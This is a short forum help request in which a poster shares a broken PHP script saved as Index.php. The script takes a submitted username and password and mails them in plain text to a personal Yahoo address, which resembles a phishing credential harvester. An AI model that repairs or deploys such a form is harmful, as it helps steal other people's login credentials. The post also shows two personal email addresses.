Riley
2011-06-14 18:57:34 UTC
$success = mail($webMaster, $Subject, $body, $headers)
Here is all the coding..
$Subject = 'User Control Password';
$webMaster = 'riri321@yahoo.com';
$email = 'rileykconverse@gmail.com';
$Username = $_POST['Username'];
$Password = $_POST['Password'];
$body = <<
Username: $Username
Password: $Password
EOD;
$headers = "From: $email\r\n";
$headers .= "Content=type: text/html\r\n";
$success = mail($webMaster, $Subject, $body, $headers);
?>
I saved this as Index.php
Can someone please tell me what I'm doing wrong.